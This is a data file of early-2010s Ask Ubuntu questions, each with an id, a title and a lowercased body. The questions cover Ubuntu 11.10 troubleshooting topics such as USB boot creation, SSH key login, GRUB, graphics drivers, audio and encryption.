87368	is there a command-line alternative to usb-creator-gtk ?	i 'm trying to create a bootable usb stick of ubuntu-11.10-desktop-i386.iso using usb-creator-gtk on my thinkpad x220 . usb-creator-gtk appears to work ok , but the resulting stick fails to boot either of my laptops . i tried two different usb sticks . boot just shows a blinking cursor . if i mount the usb stick , i see it has 729m of data on it . one more clue : after usb-creator-gtk exits , the activity light on my usb drive continues to blink for a minute or so , and even after that 's done , /media/xxxx-xxxx and /tmp/tmpxxxxxx remain mounted . i have been manually umounting them before pulling out the stick . is there any way to get debug output from usb-creator-gtk ? or is there a straightforward command-line alternative to usb-creator-gtk that would offer more debugging options ? update : in syslog , i noticed the error : usb-creator-gtk [ xxxxx ] : segfault at 4 ip xxxxxxxxxxxxxxxx sp xxxxxxxxxxxxxxxx error 6 in libdbus-1.so.3.5.7 [ xxxxxxxxxxxx+xxxxx ] turns out this is ubuntu bug # 875758 . is there an alternative to usb-creator-gtk ? ideally , a bash recipe that would help me isolate the problem and work around it ?
87373	how can i extract content from a nokia e5-00 ?	i have been trying to find software to extract data from a nokia e5-00 . everything nokia-related that i 've found seems to be a bit old ( my model is not supported ) . what software can i use to extract the following from my phone : contacts messages media separate applications for each task is acceptable . the ability to do more than just extract the data would be nice but is not required . extracting the data into a nice standard format would be very nice .
87376	selecting `` single display desktop ( multidesktop ) '' with ati catalyst 11.11 does n't work as expected	ok so i looked everywhere and i 'm still not been able to find a solution for my problem . i 'm running ubuntu 11.10 , with unity 3d and ati catalyst 11.11 , i have an ati radeon hd 6870 and i have a monitor with a resolution of 1600x900 connected by dvi and a tv with a resolution of 1920x1080 connected by hdmi . so what i want to do is to set a dual monitor configuration i 've tried in the catalyst using my monitor as first monitor and the tv as second and choosing the `` single display desktop ( multi-desktop ) '' on the tv properties but i did n't get any result , then i tried from the `` displays '' section on ubuntu and i got this message : '' the selected configuration for displays could not be applied required virtual size does not fit available size : requested= ( 3520 , 1080 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) '' the only way that the configuration could work was my monitor on the top of the tv instead being side to side `` so they do n't exceed the resolution '' but that do n't work for me so later and after reading a lot of posts i realize that that catalyst have a bug and if i execute the command sudo amdcccle it starts the catalyst and when i set up `` single display desktop ( multi-desktop ) '' on my second monitor ( the tv ) it ask me to restart so i can have that configuration ( everything fine until here ) . but my problem is that when i restart my computer i got my first monitor fine but in my tv i got a blank screen and instead of the mouse i got an x , somebody know how to fix this ? ? ? and if that have something to do with the resolution ? ? because i 'm planing to buy another 1600x900 monitor so i 'll have a triple display configuration .
87377	what metadata does shotwell not add to photos ?	shotwell stores the following information in its own database : tag , title , rating , event and photo transformation ( have i missed anything ? ) . it also has the option to `` write tags , titles , and other metadata to photo files '' . if i select this option , is all of the metadata stored in the file ? if not , which metadata is not stored in the file ?
87378	how can i use jack for all my system sounds ?	i have a firewire soundcard ( phonic firefly808 [ not the `` 808-u '' version ! ] ) which i would like to use as my standard soundcard . from what i found out , it seems like only ffado could get this firewire card running . ffado only runs with jack , so i installed jack ( which i wanted to use for realtime audio anyway ) . now i can play sound via jack . the next step would be to redirect all system sounds and the sound output of all applications to run through jackd . i searched the web for audio bridges , but i 'm not even sure what sound system is used by ubuntu 11.10 ( which i re-installed 20min ago ) . there is alsa , pulseaudio , oss and millions more and i 'm lacking knowledge about the topic . so after this long story my short question : how can i use jack for all my system sounds ? thank you very much !
87380	pipe bind9 logs to a shell.php script	i am trying to extract some data from bind9 's query log . i like to pipe the queries to a script first and then parse it , then log it . how do i do this ? please help . logging { channel simple_log { file `` /var/log/named/log.sh '' versions 10 size 10m ; < -- - is this possible ? print-time yes ; print-severity yes ; print-category yes ; } ; category default { simple_log ; } ; category queries { simple_log ; } ; } ;
87384	no local console ( just ubuntu start screen ) after today 's kernel update to 3.0.0.14	most services are running , and i can ssh to it without problems . just have no local consoles ( can not ctrl+alt+f1 , f2 ... ) and no graphic session either ... . looks like somethings not playing nice with the new kernel , but , how do i trace it ?
87386	how to run virginbroadband from usb in 11.10 ?	i need to know how to install and run this virgin broadband from ubuntu 11.10. from australia . i have the username , password and apn but it does not seem to connect . any help will be appreciated , thanks !
87391	how do i use ssh with key access in 11.10	i 've used ssh before and password access from my new asus k53by laptop with a fresh 11.10 install to dev server works fine . i wanted to set up key access for added security and ease of scripting and i did the following : paul @ paul-k53by : ~/.ssh $ ssh-keygen generating public/private rsa key pair . enter file in which to save the key ( /home/paul/.ssh/id_rsa ) : enter passphrase ( empty for no passphrase ) : enter same passphrase again : your identification has been saved in /home/paul/.ssh/id_rsa . your public key has been saved in /home/paul/.ssh/id_rsa.pub . the key fingerprint is : 7e:91 : b2:2b : a9 : bc : f8:11 : d1 : aa : ea:41 : c5:1a:39 : ff paul @ paul-k53by paul @ paul-k53by : ~/.ssh $ ssh-copy-id -i id_rsa.pub 10.1.1.28 paul @ 10.1.1.28 's password : now try logging into the machine , with `` ssh '10.1.1.28 ' '' , and check in : ~/.ssh/authorized_keys to make sure we have n't added extra keys that you were n't expecting . paul @ paul-k53by : ~/.ssh $ ssh 10.1.1.28 paul @ 10.1.1.28 's password : everything seemed to work but i still needed to use the password . i also wanted a convenient handle for the server ( without the hassle of dns ) so i set up ~/.ssh/config as follows : host dev hostname 10.1.1.28 passwordauthentication no pubkeyauthentication yes ssh dev then failed : paul @ paul-k53by : ~/.ssh $ ssh dev permission denied ( publickey , password ) . switching password back on showed that ssh dev works fine still with the password . paul @ paul-k53by : ~/.ssh $ ssh -vvv dev openssh_5.8p1 debian-7ubuntu1 , openssl 1.0.0e 6 sep 2011 debug1 : reading configuration data /home/paul/.ssh/config debug1 : applying options for dev debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 10.1.1.28 [ 10.1.1.28 ] port 22. debug1 : connection established . debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/paul/.ssh/id_rsa '' as a rsa1 public key debug2 : key_type_from_name : unknown key type ' -- -- -begin' debug3 : key_read : missing keytype debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug2 : key_type_from_name : unknown key type ' -- -- -end' debug3 : key_read : missing keytype debug1 : identity file /home/paul/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/paul/.ssh/id_rsa-cert type -1 debug1 : identity file /home/paul/.ssh/id_dsa type -1 debug1 : identity file /home/paul/.ssh/id_dsa-cert type -1 debug1 : identity file /home/paul/.ssh/id_ecdsa type -1 debug1 : identity file /home/paul/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.3p1 debian-3ubuntu7 debug1 : match : openssh_5.3p1 debian-3ubuntu7 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.8p1 debian-7ubuntu1 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` 10.1.1.28 '' from file `` /home/paul/.ssh/known_hosts '' debug3 : load_hostkeys : found key type rsa in file /home/paul/.ssh/known_hosts:1 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ssh-rsa-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-rsa debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-rsa , ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug2 : dh_gen_key : priv key bits set : 123/256 debug2 : bits set : 500/1024 debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : server host key : rsa eb : f9:56 : b8 : ae : b0 : de:27:92:06:8f : ac : c1:43 : e4:64 debug3 : load_hostkeys : loading entries for host `` 10.1.1.28 '' from file `` /home/paul/.ssh/known_hosts '' debug3 : load_hostkeys : found key type rsa in file /home/paul/.ssh/known_hosts:1 debug3 : load_hostkeys : loaded 1 keys debug1 : host '10.1.1.28 ' is known and matches the rsa host key . debug1 : found key in /home/paul/.ssh/known_hosts:1 debug2 : bits set : 511/1024 debug1 : ssh_rsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/paul/.ssh/id_rsa ( 0xb9434eb0 ) debug2 : key : /home/paul/.ssh/id_dsa ( ( nil ) ) debug2 : key : /home/paul/.ssh/id_ecdsa ( ( nil ) ) debug1 : authentications that can continue : publickey , password debug3 : start over , passed a different list publickey , password debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/paul/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/paul/.ssh/id_dsa debug3 : no such identity : /home/paul/.ssh/id_dsa debug1 : trying private key : /home/paul/.ssh/id_ecdsa debug3 : no such identity : /home/paul/.ssh/id_ecdsa debug2 : we did not send a packet , disable method debug1 : no more authentication methods to try . permission denied ( publickey , password ) . all that output is telling me something but i 'm not sure what . what have i done wrong and why ca n't i get this ssh by key to work ? there seem to be quite a few questions here about 11.10 ssh/key access issues but i could not see anything i could try anywhere that might solve this for me .
87392	i see how to have left alt swapped with left win ; can i have right alt swapped with right win ?	i use an ibm model m , so i do n't actually have win keys . in windows , i 've had right-alt set to act as the win key , and i 'd like to set that up on ubuntu as well . i went to the keyboard layout options and found an option for left alt is swapped with left win , but i did n't see one to do the same for the right . swapping the left just does n't work for me -- alt+tab is particularly difficult with only right alt acting as alt . am i just missing something , or is there no way to swap right alt and right win ?
87395	how can i enable hardware acceleration for an ati radeon hd ?	when playing high definition video ( 720p and 1080p ) the cpu reaches 100 % and freezes the image at regular intervals . according to the manufacturer this accelerator is capable of hardware acceleration for hd video . clearly something is not right . this is the output of vainfo : ivan @ ivan-nt-a2400-nt-a3500 : ~ $ vainfo libva : libva version 0.32.0 xlib : extension `` xfree86-dri '' missing on display `` :0.0 '' . libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/dri/fglrx_drv_video.so libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit thanks for the help . here you have the information of vainfo : ivan @ ivan-nt-a2400-nt-a3500 : ~ $ vainfo libva : libva version 0.32.0 xlib : extension `` xfree86-dri '' missing on display `` :0.0 '' . libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/dri/fglrx_drv_video.so libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit i have not yet installed / uninstalled anything in the system . this pc came with the system preinstalled . ati drivers are installed . here i have picture with info on x : sorry : this image shows vainfo information and drivers of my system .
87396	processes and .desktop launchers ( identification )	i have a python application which behaves in two different ways . when started without arguments , it runs in configmode and shows a configuration gui ( pygtk ) . when started with an argument it runs in appmode . then i have two bash-scripts ( configmode and appmode ) to start . one starts my app with arguments , the other without . for each script i have created a .desktop file in ~/.local/share/applications with different icons . but even when i start appmode.desktop the unity launcher shows the icon from configmode.desktop . i also use kupfer to launch applications . and when configmode is already running kupfer also thinks that appmode is already running . therefore i wonder how unity and kupfer identify which .desktop file to use ? my goal is to see the icon from the .desktop file which i used for startup in the unity launcher . how can i achive this ?
87400	unable to boot after new kernel installation	i have installed ubuntu 11.10 in my laptop . recently i compiled and installed a 2.6.38 for lttng kernel trace purpose . after installation when i reboot i could not boot either to the default kernel or to 2.6.38 . when i boot to these kernel it shows the following messages and then hangs : stopping save kernel messages . [ ok ] starting bluetooth [ ok ] pulsed audio configured for per-user sessons sand disable edit /etc/default/sand i have tried alt+ctrl+f1 and updated the grub2 , still not working . kindly help me
87401	how can i enable remote control/desktop sharing on lubuntu	what do i need to do to enable desktop sharing on ( lubuntu ) i want to control it from ubuntu 11.10 , if possible to also do it from a windows pc would be great . but not if it uses more load or might make the system unstable though .
87405	libreoffice impress : slide mask for title slides	i 'm having lots of trouble to tame libreoffice impress . i 'm creating a `` theme '' for a presentation i make . i would like to have several master pages ( not sure of the english name , in french it 's `` page maăžtresse '' ) , one for the general slide ( title + content ) and one for the presentation title and subtitle . it seems that when in the mask edition mode ( why is that in the view/ '' affichage '' menu ? ) you ca n't link a master page to a slide layout . any hint on how to do that ?
87407	risk involved with using ppa from old release ?	i have some ppa 's in my update sources that do n't maintain active builds for oneiric . is it safe to continue receiving updates from these ppa 's using builds for prior releases like natty or maverick ? thanks .
87409	i ca n't get grub menu to show up during boot	after trying ( and failing ) to install better ati drivers in 11.10 , i 've somehow lost my grub menu at boot time . the screen does change to the familiar purple colour , but instead of a list of boot options it 's just blank solid colour , and then disappears quickly and boots into the default entry normally . how can i get the bootloader back ? i 've tried sudo update-grub and also various different combinations of resolutions and colour depths in startupmanager application with no success ( 640x480 , 1024x768 , 1600x1200 , 16 bits , 8 bits , 10 second delay , 7 second delay , 2 second delay ... ) edit : i have already tried holding down shift during bootup and it does not seem to change the behaviour . i get the message `` grub loading '' in the terminal , but then the place where the grub menu normally appears i get a solid blank magenta screen for a while . here are the contents of /etc/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' vga=798 splash '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
87412	11.10 external display on ati configuration	i have attached external display to my laptop ( dell vostro 3350 with ati radeon hd6470 video card ) but image has bad quality : everything is blurred . where and how to configure that ?
87415	how can i find out if a specific program is installed ?	i want to find out if a program - chromium for example - is installed on ubuntu or not . manually or as a package . how do i know if a program is installed via command line ?
87419	how can i add text and images ( for example , a signature ) to a pdf ?	on occasion i receive forms to fill in as pdfs intended for printing ( these are not true pdf forms , they do not contain fields ) . i would like to type onto them , and perhaps add a scanned copy of my signature . this way i could just email them back . is this possible ?
87426	kvm switch not detecting keyboard	i 've just plugged in a belkin flip kvm to handle switching between my desktop and my eee pc 1000 . the mouse and monitor switch fine , but the separate keyboard does not work when the kvm switches to the netbook . the keyboard integrated into the netbook works fine , and the separate keyboard works fine when the kvm switches to the desktop . this model of kvm runs the keyboard and mouse through a single usb , i suspect this is what is confusing the eee pc . how can i get the eee pc to detect and use the seperate keyboard ? both machines are running oneiric .
87427	gpg error from apt-get	whenever i run apt-get update or apt-get install i get an error akin to the following : w : gpg error : http : //au.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //au.archive.ubuntu.com oneiric-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release w : some index files failed to download . they have been ignored , or old ones used instead . i am skeptical about just removing the keys without replacement keys ; so thought it best to ask here . how do i replace the signatures ; and what should i replace them with ?
87428	ubuntu 11.10 issues with jungledisk desktop	since i 've upgraded to 11.10 , i can not get my jungledisk application to work .
87436	how many displays are supported by ubuntu ?	i have a 5 monitor setup at work and would like to go to ubuntu , but only if i can get all of my displays to work . how many monitors can ubuntu support at one time ? ?
87437	kernel update on a usb stick installation fails with grub-probe error	i 'm diagnosing some hardware issues using a usb stick installation of ubuntu 11.10 . the usb stick was set up with the 11.10 image and the pendrivelinux.com method as recommended from the ubuntu website . the usb stick is 8 gb . my notebook allows me to boot from usb directly , so the hdd still has a micro $ oft-style boot structure ( windows 7 ) . after playing with the o/s a bit ( and learning that my hdd has 15000 reallocated sectors ) the update manager prompted me to install some updates . everything updated correctly except for the kernel update ( 3.0.0.14 ) . there seems to be a grub error : ubuntu @ ubuntu : /dev $ sudo apt-get install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 21 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up linux-image-3.0.0-14-generic ( 3.0.0-14.23 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.0.0-14-generic /boot/vmlinuz-3.0.0-14-generic update-initramfs : generating /boot/initrd.img-3.0.0-14-generic cryptsetup : warning : failed to detect canonical device of overlayfs cryptsetup : warning : could not determine root device from /etc/fstab run-parts : executing /etc/kernel/postinst.d/pm-utils 3.0.0-14-generic /boot/vmlinuz-3.0.0-14-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.0.0-14-generic /boot/vmlinuz-3.0.0-14-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.0.0-14-generic /boot/vmlinuz-3.0.0-14-generic /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 which persists any time i try to repeat the installation . fortunately , the system is always left in a bootable state despite the failure . do i have to take some special steps to update the kernel ? do i have a subtle installation issue that i need to manually address to get past this ? at least one other has had the same issue on an older version of the o/s . i will provide the output of mount ( as was requested in the previous question ) when i get access to the laptop again . edit : the results of 'mount ' : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sdb1 on /cdrom type vfat ( rw , relatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) edit # 2 : i 've determined that the pendrivelinux.com flash drive utility may be playing a role in this . the usb stick containing my ubuntu distribution gets formatted as fat32 , and the boot loader that 's being installed is not actually grub but syslinux , as per the boot_info_script script . it makes sense that grub-probe ca n't figure out what to do considering that grub is not involved whatsoever in the boot process . ( this leads me to wonder why does n't apt-get check for a grub bootloader as a dependency before attempting a kernel update ? ) i suppose the next step is to try and overwrite syslinux with grub and try to get the stick bootable that way , then see if updates work . my first stab at this led to an unbootable system - grub was loading , i could load the kernel ok but could n't figure out what to mount as root . i had to wipe and reinstall on the flash drive to get going again .
87441	does ecryptfs-setup-private use real time encryption ?	i 'm trying to encrypt some sensitive files on my computer , and i 'm trying to figure out what the best option is . i 'm considering using ecryptfs-setup-private or a true crypt file container . i like ecryptfs because it seems more native to ubuntu ( it 's in the repository after all ) , and it makes sense to have private in my home directory . what i want to know is this : if i hibernate or have a hard power off while the private directory is mounted , can someone use a live cd or mount my hard drive on another computer and see the contents of private , or is private encrypted real time while i am accessing files ?
87443	how to access a machine through vnc using ssh ?	we have more than 500 systems running ubuntu in our office . and sometimes after installation we forget to enable to remote desktop . so that we was not able to control that pc remotely . is there any way to access that machine remotely using ssh ? coz ssh was installed in that remote machine . also if that machine was in login screen we was not able to view through vnc . i guess ssh will be a good solution . can anyone help me ? thanks in advance .
87445	what is the current state of the ubuntu professional certification ?	i 've heard the ubuntu professional certification is no longer offered , although the course can be purchased here : http : //shop.canonical.com/product_info.php ? products_id=533 is this true ? after studying the course , is there no exam or certification given any more ?
87447	how can i install adobe air ?	i am a heavy user of certain applications that are built on air . it appears that air has discontinued support for linux . even the older versions in the adobe air archives seem to support only 32 bit linux distributions and i am on 64 bit currently . is there even a slight possibility that i could run air in these conditions ? if so , can you please tell me where can i get a detailed step by step installation for this ?
87449	how to disable strict host key checking in ssh ?	i would like to disable strict host key checking in ssh for ubuntu 11.04 . how to do it ?
87450	opening terminal attempting to run unknown script	something odd has just started happening . on opening a new terminal , the first line of the terminal now says : install : target 'xmas ' is not a directory . i 've no idea what is causing that to happen , or how to track it down . i 'm on ubuntu 11.10 . my terminal is zsh , with oh my zsh . here is my .zshrc file and my oh-my-zsh.sh file ( it is unchanged from the original ) . what should i investigate next ?
87458	ubuntuone on kubuntu	is there support for kde ? i want to install u1 on my kubuntu computers and get rid of dropbox but i can not until it has dolphin support . thanks . kubuntu 11.10 x64
87459	deployment of rails application using passenger and apache2	is there anything special related to deploying a rails application in ubuntu using passenger and apache2 ? i 've installed passenger appropriately as indicated in the many instruction pages , but every time i add a new element within my sites-available directory ( and subsequently a2ensite the file ) , i have no response at all . in addition , passenger-status reports nothing . < virtualhost *:80 > documentroot /var/www/html/mynewapp/public < directory /var/www/html/mynewapp/public > allow from all options -multiviews < /directory > < /virtualhost > the webserver on which i must deploy the ( sample ) application is used purely for internal purposes , and has only a local ip addres ( hence no domain crap , and why i have excluded the servername directive ) . strange thing is that i do n't even get an error in the apache error_log . any ideas ?
87460	how to stop my system freezing when streaming videos ?	when i stream a video from youtobe and others i can only see a couple of minutes until it crashes , and the system freezes . the audio keeps on playing for a few seconds then just keeps looping the same few seconds with the screen locked . so i have to manually restart my machine using the hardware , which clearly is n't good for it . not sure if its flash or h264 - youtube uses both types right ? thanks in advance .
87462	how to go to previous step in 10.04 server installation ?	i 'm installing ubuntu server 10.04 in text mode . how to go to previous step to configure network ?
87467	how to get a encrypted folder with passphrase	i have some data that i want to encrypt in a single folder . i only need it rarely , so i would like to be asked for a pass phrase every time . preferably i could still back up the folder encrypted , and open it with the passphrase on another machine . what approach shall i take ?
87468	how to specify dns ip in wicd ?	i am trying to use a different dns server other than my router . i 've tried editing /etc/resolv.conf , but my changes always get overwritten . here 's my networks ' config : yet , this is what my /etc/resolv.conf file looks like : # generated by resolvconf search myhome.westell.com nameserver 192.168.1.1
87474	change account in ubuntu one ?	i inadvertently created a new ubuntu one account for myself when i got a new laptop . ( i have 2 email addresses , and the one i input was not the one on which i had already created my ubuntu one account . ) now that i have set up ubuntu one incorrectly on this computer , there does not seem to be any way to rectify the situation . i have tried removing and reinstalling ubuntu one according to the instructions at https : //answers.launchpad.net/ubuntuone-client/+faq/778 . when i start up the ubuntu one client after reinstalling , it asks for authentication , and then says `` ubuntu one is installing ... '' basically forever . if i quit the ubuntu one client and try starting it again , the same thing happens . using 11.10 on a lenovo laptop .
87485	getting webgl to work on toshiba satellite l30-11g	i have a ubuntu 11.10 on toshiba satellite l30-11g with radeon xpress 200m graphics card . is it possible for me to get webgl enabled on chrome and if it is ; how ? http : //get.webgl.org/ says hmm . while your browser seems to support webgl , it is disabled or unavailable . if possible , please ensure that you are running the latest drivers for your video card . lspci | grep vga 01:05.0 vga compatible controller : ati technologies inc rc410 [ radeon xpress 200m ] system info > graphics driver : gallium 0.4 on ati rc410 experience : fallback not sure if these are useful ?
87486	payments in local currency in software centre	i 'm from the uk and buying software from the software centre in usd incurs charges from my bank . are there any plans to allow payments in local currency ?
87488	how to get new blue tweetdeck on ubuntu ?	as you guys know , new desktop tweetdeck is out for windows and mac . i am using tweetdeck on air in my ubuntu . on their website , air based version is not available . can i get that blue iconed tweetdeck on ubuntu ?
